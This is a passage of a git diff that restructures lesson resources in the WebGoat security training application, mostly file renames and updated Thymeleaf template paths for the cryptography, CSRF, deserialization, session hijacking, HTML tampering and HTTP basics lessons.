rename from webgoat-lessons/crypto/src/main/resources/lessonPlans/en/encoding_plan2.adoc
rename to src/main/resources/lessons/cryptography/documentation/encoding_plan2.adoc
diff --git a/webgoat-lessons/crypto/src/main/resources/lessonPlans/en/encryption.adoc b/src/main/resources/lessons/cryptography/documentation/encryption.adoc
similarity index 100%
rename from webgoat-lessons/crypto/src/main/resources/lessonPlans/en/encryption.adoc
rename to src/main/resources/lessons/cryptography/documentation/encryption.adoc
diff --git a/webgoat-lessons/crypto/src/main/resources/lessonPlans/en/hashing_plan.adoc b/src/main/resources/lessons/cryptography/documentation/hashing_plan.adoc
similarity index 100%
rename from webgoat-lessons/crypto/src/main/resources/lessonPlans/en/hashing_plan.adoc
rename to src/main/resources/lessons/cryptography/documentation/hashing_plan.adoc
diff --git a/webgoat-lessons/crypto/src/main/resources/lessonPlans/en/keystores.adoc b/src/main/resources/lessons/cryptography/documentation/keystores.adoc
similarity index 100%
rename from webgoat-lessons/crypto/src/main/resources/lessonPlans/en/keystores.adoc
rename to src/main/resources/lessons/cryptography/documentation/keystores.adoc
diff --git a/webgoat-lessons/crypto/src/main/resources/lessonPlans/en/postquantum.adoc b/src/main/resources/lessons/cryptography/documentation/postquantum.adoc
similarity index 100%
rename from webgoat-lessons/crypto/src/main/resources/lessonPlans/en/postquantum.adoc
rename to src/main/resources/lessons/cryptography/documentation/postquantum.adoc
diff --git a/webgoat-lessons/crypto/src/main/resources/lessonPlans/en/signing.adoc b/src/main/resources/lessons/cryptography/documentation/signing.adoc
similarity index 100%
rename from webgoat-lessons/crypto/src/main/resources/lessonPlans/en/signing.adoc
rename to src/main/resources/lessons/cryptography/documentation/signing.adoc
diff --git a/webgoat-lessons/crypto/src/main/resources/html/Crypto.html b/src/main/resources/lessons/cryptography/html/Cryptography.html
similarity index 82%
rename from webgoat-lessons/crypto/src/main/resources/html/Crypto.html
rename to src/main/resources/lessons/cryptography/html/Cryptography.html
index bd06030e6..6e6f32767 100644
--- a/webgoat-lessons/crypto/src/main/resources/html/Crypto.html
+++ b/src/main/resources/lessons/cryptography/html/Cryptography.html
@@ -18,11 +18,11 @@ $(document).ready(initialise);
 <body>
 	<!-- 1. overview -->
 	<div class="lesson-page-wrapper">
-		<div class="adoc-content" th:replace="doc:Crypto_plan.adoc"></div>
+		<div class="adoc-content" th:replace="doc:lessons/cryptography/documentation/Crypto_plan.adoc"></div>
 	</div>
 	<!-- 2. encoding -->
 	<div class="lesson-page-wrapper">
-		<div class="adoc-content" th:replace="doc:encoding_plan.adoc"></div>
+		<div class="adoc-content" th:replace="doc:lessons/cryptography/documentation/encoding_plan.adoc"></div>
 		<!-- 2. assignment -->
 		<div class="attack-container">
 			<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
@@ -41,7 +41,7 @@ $(document).ready(initialise);
 	</div>
 	<!-- 3. encoding xor -->
 	<div class="lesson-page-wrapper">
-		<div class="adoc-content" th:replace="doc:encoding_plan2.adoc"></div>
+		<div class="adoc-content" th:replace="doc:lessons/cryptography/documentation/encoding_plan2.adoc"></div>
 		<!-- 3. assignment xor -->
 		<div class="attack-container">
 			<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
@@ -58,7 +58,7 @@ $(document).ready(initialise);
 
 	<!-- 4. hashing -->
 	<div class="lesson-page-wrapper">
-		<div class="adoc-content" th:replace="doc:hashing_plan.adoc"></div>
+		<div class="adoc-content" th:replace="doc:lessons/cryptography/documentation/hashing_plan.adoc"></div>
 		<!-- 4. weak hashing exercise -->
 		<div class="attack-container">
 			<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
@@ -76,12 +76,12 @@ $(document).ready(initialise);
 	
 	<!-- 5. encryption -->
 	<div class="lesson-page-wrapper">
-		<div class="adoc-content" th:replace="doc:encryption.adoc"></div>
+		<div class="adoc-content" th:replace="doc:lessons/cryptography/documentation/encryption.adoc"></div>
 	</div>
 
 	<!-- 6. signing -->
 	<div class="lesson-page-wrapper">
-		<div class="adoc-content" th:replace="doc:signing.adoc"></div>
+		<div class="adoc-content" th:replace="doc:lessons/cryptography/documentation/signing.adoc"></div>
 		<!-- 6. assignment -->
 		<div class="attack-container">
 			<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
@@ -101,12 +101,12 @@ $(document).ready(initialise);
 	
 	<!-- 7. keystores -->
 	<div class="lesson-page-wrapper">
-		<div class="adoc-content" th:replace="doc:keystores.adoc"></div>
+		<div class="adoc-content" th:replace="doc:lessons/cryptography/documentation/keystores.adoc"></div>
 	</div>
 	
 	<!-- 8. security defaults -->
 	<div class="lesson-page-wrapper">
-		<div class="adoc-content" th:replace="doc:defaults.adoc"></div>
+		<div class="adoc-content" th:replace="doc:lessons/cryptography/documentation/defaults.adoc"></div>
 		<!-- 8. assignment -->
 		<div class="attack-container">
 			<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
@@ -123,7 +123,7 @@ $(document).ready(initialise);
 	</div>
 	<!-- 9. postquantum -->
 	<div class="lesson-page-wrapper">
-		<div class="adoc-content" th:replace="doc:postquantum.adoc"></div>
+		<div class="adoc-content" th:replace="doc:lessons/cryptography/documentation/postquantum.adoc"></div>
 	</div>
 </body>
-</html>
\ No newline at end of file
+</html>
diff --git a/webgoat-lessons/crypto/src/main/resources/i18n/WebGoatLabels.properties b/src/main/resources/lessons/cryptography/i18n/WebGoatLabels.properties
similarity index 100%
rename from webgoat-lessons/crypto/src/main/resources/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/cryptography/i18n/WebGoatLabels.properties
diff --git a/webgoat-lessons/csrf/src/main/resources/css/reviews.css b/src/main/resources/lessons/csrf/css/reviews.css
similarity index 100%
rename from webgoat-lessons/csrf/src/main/resources/css/reviews.css
rename to src/main/resources/lessons/csrf/css/reviews.css
diff --git a/webgoat-lessons/csrf/src/main/resources/lessonPlans/en/CSRF_Basic_Get-1.adoc b/src/main/resources/lessons/csrf/documentation/CSRF_Basic_Get-1.adoc
similarity index 100%
rename from webgoat-lessons/csrf/src/main/resources/lessonPlans/en/CSRF_Basic_Get-1.adoc
rename to src/main/resources/lessons/csrf/documentation/CSRF_Basic_Get-1.adoc
diff --git a/webgoat-lessons/csrf/src/main/resources/lessonPlans/en/CSRF_ContentType.adoc b/src/main/resources/lessons/csrf/documentation/CSRF_ContentType.adoc
similarity index 100%
rename from webgoat-lessons/csrf/src/main/resources/lessonPlans/en/CSRF_ContentType.adoc
rename to src/main/resources/lessons/csrf/documentation/CSRF_ContentType.adoc
diff --git a/webgoat-lessons/csrf/src/main/resources/lessonPlans/en/CSRF_Frameworks.adoc b/src/main/resources/lessons/csrf/documentation/CSRF_Frameworks.adoc
similarity index 100%
rename from webgoat-lessons/csrf/src/main/resources/lessonPlans/en/CSRF_Frameworks.adoc
rename to src/main/resources/lessons/csrf/documentation/CSRF_Frameworks.adoc
diff --git a/webgoat-lessons/csrf/src/main/resources/lessonPlans/en/CSRF_GET.adoc b/src/main/resources/lessons/csrf/documentation/CSRF_GET.adoc
similarity index 100%
rename from webgoat-lessons/csrf/src/main/resources/lessonPlans/en/CSRF_GET.adoc
rename to src/main/resources/lessons/csrf/documentation/CSRF_GET.adoc
diff --git a/webgoat-lessons/csrf/src/main/resources/lessonPlans/en/CSRF_Get_Flag.adoc b/src/main/resources/lessons/csrf/documentation/CSRF_Get_Flag.adoc
similarity index 100%
rename from webgoat-lessons/csrf/src/main/resources/lessonPlans/en/CSRF_Get_Flag.adoc
rename to src/main/resources/lessons/csrf/documentation/CSRF_Get_Flag.adoc
diff --git a/webgoat-lessons/csrf/src/main/resources/lessonPlans/en/CSRF_Impact_Defense.adoc b/src/main/resources/lessons/csrf/documentation/CSRF_Impact_Defense.adoc
similarity index 100%
rename from webgoat-lessons/csrf/src/main/resources/lessonPlans/en/CSRF_Impact_Defense.adoc
rename to src/main/resources/lessons/csrf/documentation/CSRF_Impact_Defense.adoc
diff --git a/webgoat-lessons/csrf/src/main/resources/lessonPlans/en/CSRF_JSON.adoc b/src/main/resources/lessons/csrf/documentation/CSRF_JSON.adoc
similarity index 100%
rename from webgoat-lessons/csrf/src/main/resources/lessonPlans/en/CSRF_JSON.adoc
rename to src/main/resources/lessons/csrf/documentation/CSRF_JSON.adoc
diff --git a/webgoat-lessons/csrf/src/main/resources/lessonPlans/en/CSRF_Login.adoc b/src/main/resources/lessons/csrf/documentation/CSRF_Login.adoc
similarity index 100%
rename from webgoat-lessons/csrf/src/main/resources/lessonPlans/en/CSRF_Login.adoc
rename to src/main/resources/lessons/csrf/documentation/CSRF_Login.adoc
diff --git a/webgoat-lessons/csrf/src/main/resources/lessonPlans/en/CSRF_Reviews.adoc b/src/main/resources/lessons/csrf/documentation/CSRF_Reviews.adoc
similarity index 100%
rename from webgoat-lessons/csrf/src/main/resources/lessonPlans/en/CSRF_Reviews.adoc
rename to src/main/resources/lessons/csrf/documentation/CSRF_Reviews.adoc
diff --git a/webgoat-lessons/csrf/src/main/resources/lessonPlans/en/CSRF_intro.adoc b/src/main/resources/lessons/csrf/documentation/CSRF_intro.adoc
similarity index 100%
rename from webgoat-lessons/csrf/src/main/resources/lessonPlans/en/CSRF_intro.adoc
rename to src/main/resources/lessons/csrf/documentation/CSRF_intro.adoc
diff --git a/webgoat-lessons/csrf/src/main/resources/html/CSRF.html b/src/main/resources/lessons/csrf/html/CSRF.html
similarity index 91%
rename from webgoat-lessons/csrf/src/main/resources/html/CSRF.html
rename to src/main/resources/lessons/csrf/html/CSRF.html
index 169a2edb6..01fdb696c 100644
--- a/webgoat-lessons/csrf/src/main/resources/html/CSRF.html
+++ b/src/main/resources/lessons/csrf/html/CSRF.html
@@ -3,15 +3,15 @@
 <html xmlns:th="http://www.thymeleaf.org">
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:CSRF_intro.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/csrf/documentation/CSRF_intro.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:CSRF_GET.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/csrf/documentation/CSRF_GET.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:CSRF_Get_Flag.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/csrf/documentation/CSRF_Get_Flag.adoc"></div>
 
     <form accept-charset="UNKNOWN" id="basic-csrf-get"
           method="POST" name="form1"
@@ -23,7 +23,7 @@
 
     </form>
 
-    <div class="adoc-content" th:replace="doc:CSRF_Basic_Get-1.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/csrf/documentation/CSRF_Basic_Get-1.adoc"></div>
 
     <div class="attack-container">
         <img th:src="@{/images/wolf-enabled.png}" class="webwolf-enabled"/>
@@ -54,7 +54,7 @@
 
 <div class="lesson-page-wrapper">
 
-    <div class="adoc-content" th:replace="doc:CSRF_Reviews.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/csrf/documentation/CSRF_Reviews.adoc"></div>
 
     <!-- comment area -->
     <link rel="stylesheet" type="text/css" th:href="@{/lesson_css/reviews.css}"/>
@@ -121,15 +121,15 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:CSRF_Frameworks.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/csrf/documentation/CSRF_Frameworks.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:CSRF_JSON.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/csrf/documentation/CSRF_JSON.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:CSRF_ContentType.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/csrf/documentation/CSRF_ContentType.adoc"></div>
 
     <script th:src="@{/lesson_js/feedback.js}" language="JavaScript"></script>
     <div style="container-fluid; background-color: #f1f1f1; border: 2px solid #a66;
@@ -227,7 +227,7 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:CSRF_Login.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/csrf/documentation/CSRF_Login.adoc"></div>
 
     <div class="attack-container">
         <div class="assignment-success">
@@ -251,10 +251,10 @@
 
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:CSRF_Impact_Defense.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/csrf/documentation/CSRF_Impact_Defense.adoc"></div>
 </div>
 
 
 <!--</div>-->
 
-</html>
\ No newline at end of file
+</html>
diff --git a/webgoat-lessons/csrf/src/main/resources/i18n/WebGoatLabels.properties b/src/main/resources/lessons/csrf/i18n/WebGoatLabels.properties
similarity index 100%
rename from webgoat-lessons/csrf/src/main/resources/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/csrf/i18n/WebGoatLabels.properties
diff --git a/webgoat-lessons/csrf/src/main/resources/images/login-csrf.png b/src/main/resources/lessons/csrf/images/login-csrf.png
similarity index 100%
rename from webgoat-lessons/csrf/src/main/resources/images/login-csrf.png
rename to src/main/resources/lessons/csrf/images/login-csrf.png
diff --git a/webgoat-lessons/csrf/src/main/resources/js/csrf-review.js b/src/main/resources/lessons/csrf/js/csrf-review.js
similarity index 100%
rename from webgoat-lessons/csrf/src/main/resources/js/csrf-review.js
rename to src/main/resources/lessons/csrf/js/csrf-review.js
diff --git a/webgoat-lessons/csrf/src/main/resources/js/feedback.js b/src/main/resources/lessons/csrf/js/feedback.js
similarity index 100%
rename from webgoat-lessons/csrf/src/main/resources/js/feedback.js
rename to src/main/resources/lessons/csrf/js/feedback.js
diff --git a/webgoat-lessons/insecure-deserialization/src/main/resources/lessonPlans/en/InsecureDeserialization_GadgetChain.adoc b/src/main/resources/lessons/deserialization/documentation/InsecureDeserialization_GadgetChain.adoc
similarity index 100%
rename from webgoat-lessons/insecure-deserialization/src/main/resources/lessonPlans/en/InsecureDeserialization_GadgetChain.adoc
rename to src/main/resources/lessons/deserialization/documentation/InsecureDeserialization_GadgetChain.adoc
diff --git a/webgoat-lessons/insecure-deserialization/src/main/resources/lessonPlans/en/InsecureDeserialization_Intro.adoc b/src/main/resources/lessons/deserialization/documentation/InsecureDeserialization_Intro.adoc
similarity index 100%
rename from webgoat-lessons/insecure-deserialization/src/main/resources/lessonPlans/en/InsecureDeserialization_Intro.adoc
rename to src/main/resources/lessons/deserialization/documentation/InsecureDeserialization_Intro.adoc
diff --git a/webgoat-lessons/insecure-deserialization/src/main/resources/lessonPlans/en/InsecureDeserialization_SimpleExploit.adoc b/src/main/resources/lessons/deserialization/documentation/InsecureDeserialization_SimpleExploit.adoc
similarity index 100%
rename from webgoat-lessons/insecure-deserialization/src/main/resources/lessonPlans/en/InsecureDeserialization_SimpleExploit.adoc
rename to src/main/resources/lessons/deserialization/documentation/InsecureDeserialization_SimpleExploit.adoc
diff --git a/webgoat-lessons/insecure-deserialization/src/main/resources/lessonPlans/en/InsecureDeserialization_Task.adoc b/src/main/resources/lessons/deserialization/documentation/InsecureDeserialization_Task.adoc
similarity index 100%
rename from webgoat-lessons/insecure-deserialization/src/main/resources/lessonPlans/en/InsecureDeserialization_Task.adoc
rename to src/main/resources/lessons/deserialization/documentation/InsecureDeserialization_Task.adoc
diff --git a/webgoat-lessons/insecure-deserialization/src/main/resources/lessonPlans/en/InsecureDeserialization_WhatIs.adoc b/src/main/resources/lessons/deserialization/documentation/InsecureDeserialization_WhatIs.adoc
similarity index 100%
rename from webgoat-lessons/insecure-deserialization/src/main/resources/lessonPlans/en/InsecureDeserialization_WhatIs.adoc
rename to src/main/resources/lessons/deserialization/documentation/InsecureDeserialization_WhatIs.adoc
diff --git a/webgoat-lessons/insecure-deserialization/src/main/resources/html/InsecureDeserialization.html b/src/main/resources/lessons/deserialization/html/InsecureDeserialization.html
similarity index 59%
rename from webgoat-lessons/insecure-deserialization/src/main/resources/html/InsecureDeserialization.html
rename to src/main/resources/lessons/deserialization/html/InsecureDeserialization.html
index c0b8d7afa..1b64172f4 100755
--- a/webgoat-lessons/insecure-deserialization/src/main/resources/html/InsecureDeserialization.html
+++ b/src/main/resources/lessons/deserialization/html/InsecureDeserialization.html
@@ -3,24 +3,24 @@
 <html xmlns:th="http://www.thymeleaf.org">
 
     <div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:InsecureDeserialization_Intro.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/deserialization/documentation/InsecureDeserialization_Intro.adoc"></div>
     </div>
 
     <div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:InsecureDeserialization_WhatIs.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/deserialization/documentation/InsecureDeserialization_WhatIs.adoc"></div>
     </div>
 
     <div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:InsecureDeserialization_SimpleExploit.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/deserialization/documentation/InsecureDeserialization_SimpleExploit.adoc"></div>
     </div>
 
     <div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:InsecureDeserialization_GadgetChain.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/deserialization/documentation/InsecureDeserialization_GadgetChain.adoc"></div>
     </div>
 
     <div class="lesson-page-wrapper">
         <!-- stripped down without extra comments -->
-        <div class="adoc-content" th:replace="doc:InsecureDeserialization_Task.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/deserialization/documentation/InsecureDeserialization_Task.adoc"></div>
         <div class="attack-container">
             <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
             <form class="attack-form" accept-charset="UNKNOWN" name="task"
diff --git a/webgoat-lessons/insecure-deserialization/src/main/resources/i18n/WebGoatLabels.properties b/src/main/resources/lessons/deserialization/i18n/WebGoatLabels.properties
similarity index 100%
rename from webgoat-lessons/insecure-deserialization/src/main/resources/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/deserialization/i18n/WebGoatLabels.properties
diff --git a/webgoat-lessons/client-side-filtering/src/main/resources/employees.xml b/src/main/resources/lessons/employees.xml
similarity index 100%
rename from webgoat-lessons/client-side-filtering/src/main/resources/employees.xml
rename to src/main/resources/lessons/employees.xml
diff --git a/webgoat-lessons/hijack-session/src/main/resources/lessonPlans/en/HijackSession_content0.adoc b/src/main/resources/lessons/hijacksession/documentation/HijackSession_content0.adoc
similarity index 100%
rename from webgoat-lessons/hijack-session/src/main/resources/lessonPlans/en/HijackSession_content0.adoc
rename to src/main/resources/lessons/hijacksession/documentation/HijackSession_content0.adoc
diff --git a/webgoat-lessons/hijack-session/src/main/resources/lessonPlans/en/HijackSession_plan.adoc b/src/main/resources/lessons/hijacksession/documentation/HijackSession_plan.adoc
similarity index 100%
rename from webgoat-lessons/hijack-session/src/main/resources/lessonPlans/en/HijackSession_plan.adoc
rename to src/main/resources/lessons/hijacksession/documentation/HijackSession_plan.adoc
diff --git a/webgoat-lessons/hijack-session/src/main/resources/html/HijackSession.html b/src/main/resources/lessons/hijacksession/html/HijackSession.html
similarity index 63%
rename from webgoat-lessons/hijack-session/src/main/resources/html/HijackSession.html
rename to src/main/resources/lessons/hijacksession/html/HijackSession.html
index 223de6657..a341ff809 100644
--- a/webgoat-lessons/hijack-session/src/main/resources/html/HijackSession.html
+++ b/src/main/resources/lessons/hijacksession/html/HijackSession.html
@@ -7,19 +7,19 @@
 
 <!-- 1 -->
 <div class="lesson-page-wrapper">
-	<div class="adoc-content" th:replace="doc:HijackSession_plan.adoc"></div>
+	<div class="adoc-content" th:replace="doc:lessons/hijacksession/documentation/HijackSession_plan.adoc"></div>
 </div>
 
 <!-- 2 -->
 <div class="lesson-page-wrapper">
-	<div class="adoc-content" th:replace="doc:HijackSession_content0.adoc"></div>
+	<div class="adoc-content" th:replace="doc:lessons/hijacksession/documentation/HijackSession_content0.adoc"></div>
 	<div class="attack-container">
 		<div class="assignment-success">
 			<i class="fa fa-2 fa-check hidden" aria-hidden="true"></i>
 		</div>
 
 		<div class="container-fluid">
-			<div th:include="hijackform" id="content"></div>
+			<div th:include="/lessons/hijacksession/templates/hijackform.html" id="content"></div>
 		</div>
 
 		<div class="attack-feedback"></div>
diff --git a/webgoat-lessons/hijack-session/src/main/resources/i18n/WebGoatLabels.properties b/src/main/resources/lessons/hijacksession/i18n/WebGoatLabels.properties
similarity index 100%
rename from webgoat-lessons/hijack-session/src/main/resources/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/hijacksession/i18n/WebGoatLabels.properties
diff --git a/webgoat-lessons/hijack-session/src/main/resources/lessonSolutions/en/HijackSession_solution.adoc b/src/main/resources/lessons/hijacksession/lessonSolutions/en/HijackSession_solution.adoc
similarity index 100%
rename from webgoat-lessons/hijack-session/src/main/resources/lessonSolutions/en/HijackSession_solution.adoc
rename to src/main/resources/lessons/hijacksession/lessonSolutions/en/HijackSession_solution.adoc
diff --git a/webgoat-lessons/hijack-session/src/main/resources/lessonSolutions/html/HijackSession.html b/src/main/resources/lessons/hijacksession/lessonSolutions/html/HijackSession.html
similarity index 100%
rename from webgoat-lessons/hijack-session/src/main/resources/lessonSolutions/html/HijackSession.html
rename to src/main/resources/lessons/hijacksession/lessonSolutions/html/HijackSession.html
diff --git a/webgoat-lessons/hijack-session/src/main/resources/templates/hijackform.html b/src/main/resources/lessons/hijacksession/templates/hijackform.html
similarity index 100%
rename from webgoat-lessons/hijack-session/src/main/resources/templates/hijackform.html
rename to src/main/resources/lessons/hijacksession/templates/hijackform.html
diff --git a/webgoat-lessons/html-tampering/src/main/resources/lessonPlans/en/HtmlTampering_Intro.adoc b/src/main/resources/lessons/html_tampering/documentation/HtmlTampering_Intro.adoc
similarity index 100%
rename from webgoat-lessons/html-tampering/src/main/resources/lessonPlans/en/HtmlTampering_Intro.adoc
rename to src/main/resources/lessons/html_tampering/documentation/HtmlTampering_Intro.adoc
diff --git a/webgoat-lessons/html-tampering/src/main/resources/lessonPlans/en/HtmlTampering_Mitigation.adoc b/src/main/resources/lessons/html_tampering/documentation/HtmlTampering_Mitigation.adoc
similarity index 100%
rename from webgoat-lessons/html-tampering/src/main/resources/lessonPlans/en/HtmlTampering_Mitigation.adoc
rename to src/main/resources/lessons/html_tampering/documentation/HtmlTampering_Mitigation.adoc
diff --git a/webgoat-lessons/html-tampering/src/main/resources/lessonPlans/en/HtmlTampering_Task.adoc b/src/main/resources/lessons/html_tampering/documentation/HtmlTampering_Task.adoc
similarity index 100%
rename from webgoat-lessons/html-tampering/src/main/resources/lessonPlans/en/HtmlTampering_Task.adoc
rename to src/main/resources/lessons/html_tampering/documentation/HtmlTampering_Task.adoc
diff --git a/webgoat-lessons/html-tampering/src/main/resources/html/HtmlTampering.html b/src/main/resources/lessons/html_tampering/html/HtmlTampering.html
similarity index 95%
rename from webgoat-lessons/html-tampering/src/main/resources/html/HtmlTampering.html
rename to src/main/resources/lessons/html_tampering/html/HtmlTampering.html
index f4ed29ba2..afd3dba68 100755
--- a/webgoat-lessons/html-tampering/src/main/resources/html/HtmlTampering.html
+++ b/src/main/resources/lessons/html_tampering/html/HtmlTampering.html
@@ -3,12 +3,12 @@
 <html xmlns:th="http://www.thymeleaf.org">
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:HtmlTampering_Intro.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/html_tampering/documentation/HtmlTampering_Intro.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
     <!-- stripped down without extra comments -->
-    <div class="adoc-content" th:replace="doc:HtmlTampering_Task.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/html_tampering/documentation/HtmlTampering_Task.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN" id="task" name="task"
@@ -143,6 +143,6 @@
     </div>
 </div>
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:HtmlTampering_Mitigation.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/html_tampering/documentation/HtmlTampering_Mitigation.adoc"></div>
 </div>
 </html>
diff --git a/webgoat-lessons/html-tampering/src/main/resources/i18n/WebGoatLabels.properties b/src/main/resources/lessons/html_tampering/i18n/WebGoatLabels.properties
similarity index 100%
rename from webgoat-lessons/html-tampering/src/main/resources/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/html_tampering/i18n/WebGoatLabels.properties
diff --git a/webgoat-lessons/html-tampering/src/main/resources/images/samsung.jpg b/src/main/resources/lessons/html_tampering/images/samsung.jpg
similarity index 100%
rename from webgoat-lessons/html-tampering/src/main/resources/images/samsung.jpg
rename to src/main/resources/lessons/html_tampering/images/samsung.jpg
diff --git a/webgoat-lessons/http-basics/src/main/resources/lessonPlans/en/HttpBasics_content1.adoc b/src/main/resources/lessons/http_basics/documentation/HttpBasics_content1.adoc
similarity index 100%
rename from webgoat-lessons/http-basics/src/main/resources/lessonPlans/en/HttpBasics_content1.adoc
rename to src/main/resources/lessons/http_basics/documentation/HttpBasics_content1.adoc
diff --git a/webgoat-lessons/http-basics/src/main/resources/lessonPlans/en/HttpBasics_content2.adoc b/src/main/resources/lessons/http_basics/documentation/HttpBasics_content2.adoc
similarity index 100%
rename from webgoat-lessons/http-basics/src/main/resources/lessonPlans/en/HttpBasics_content2.adoc
rename to src/main/resources/lessons/http_basics/documentation/HttpBasics_content2.adoc
diff --git a/webgoat-lessons/http-basics/src/main/resources/lessonPlans/en/HttpBasics_plan.adoc b/src/main/resources/lessons/http_basics/documentation/HttpBasics_plan.adoc
similarity index 100%
rename from webgoat-lessons/http-basics/src/main/resources/lessonPlans/en/HttpBasics_plan.adoc
rename to src/main/resources/lessons/http_basics/documentation/HttpBasics_plan.adoc
diff --git a/webgoat-lessons/http-basics/src/main/resources/html/HttpBasics.html b/src/main/resources/lessons/http_basics/html/HttpBasics.html
similarity index 92%
rename from webgoat-lessons/http-basics/src/main/resources/html/HttpBasics.html
rename to src/main/resources/lessons/http_basics/html/HttpBasics.html
index 40107f4c7..860f18f2d 100644
--- a/webgoat-lessons/http-basics/src/main/resources/html/HttpBasics.html
+++ b/src/main/resources/lessons/http_basics/html/HttpBasics.html
@@ -6,13 +6,13 @@
         <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
 		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
 		which you put in src/main/resources/lessonplans/{lang}/{fileName}.adoc -->
-		<div class="adoc-content" th:replace="doc:HttpBasics_plan.adoc"></div>
+		<div class="adoc-content" th:replace="doc:lessons/http_basics/documentation/HttpBasics_plan.adoc"></div>
 	</div>
 
 	<div class="lesson-page-wrapper">
 		<!-- reuse this block for each 'page' of content -->
         <!-- sample ascii doc content for second page -->
-		<div class="adoc-content" th:replace="doc:HttpBasics_content1.adoc"></div>
+		<div class="adoc-content" th:replace="doc:lessons/http_basics/documentation/HttpBasics_content1.adoc"></div>
         <!-- if including attack, reuse this section, leave classes in place -->
 		<div class="attack-container">
 			<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
@@ -42,7 +42,7 @@
         <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
         <!-- include content here. Content will be presented via asciidocs files,
         which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-		<div class="adoc-content" th:replace="doc:HttpBasics_content2.adoc"></div>
+		<div class="adoc-content" th:replace="doc:lessons/http_basics/documentation/HttpBasics_content2.adoc"></div>
 		<div class="attack-container">
 			<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
 			<!-- using attack-form class on your form, will allow your request to be ajaxified and stay within the display framework for webgoat -->
@@ -83,4 +83,4 @@
 		</div>
 	</div>
 
-</html>
\ No newline at end of file
+</html>
diff --git a/webgoat-lessons/http-basics/src/main/resources/i18n/WebGoatLabels.properties b/src/main/resources/lessons/http_basics/i18n/WebGoatLabels.properties
similarity index 100%
rename from webgoat-lessons/http-basics/src/main/resources/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/http_basics/i18n/WebGoatLabels.properties
diff --git a/webgoat-lessons/http-basics/src/main/resources/i18n/WebGoatLabels_de.properties b/src/main/resources/lessons/http_basics/i18n/WebGoatLabels_de.properties
similarity index 100%
rename from webgoat-lessons/http-basics/src/main/resources/i18n/WebGoatLabels_de.properties
rename to src/main/resources/lessons/http_basics/i18n/WebGoatLabels_de.properties
diff --git a/webgoat-lessons/http-basics/src/main/resources/i18n/WebGoatLabels_fr.properties b/src/main/resources/lessons/http_basics/i18n/WebGoatLabels_fr.properties
similarity index 100%
rename from webgoat-lessons/http-basics/src/main/resources/i18n/WebGoatLabels_fr.properties
rename to src/main/resources/lessons/http_basics/i18n/WebGoatLabels_fr.properties
diff --git a/webgoat-lessons/http-basics/src/main/resources/i18n/WebGoatLabels_nl.properties b/src/main/resources/lessons/http_basics/i18n/WebGoatLabels_nl.properties
similarity index 100%
rename from webgoat-lessons/http-basics/src/main/resources/i18n/WebGoatLabels_nl.properties
rename to src/main/resources/lessons/http_basics/i18n/WebGoatLabels_nl.properties
diff --git a/webgoat-lessons/http-basics/src/main/resources/i18n/WebGoatLabels_ru.properties b/src/main/resources/lessons/http_basics/i18n/WebGoatLabels_ru.properties
similarity index 100%
rename from webgoat-lessons/http-basics/src/main/resources/i18n/WebGoatLabels_ru.properties
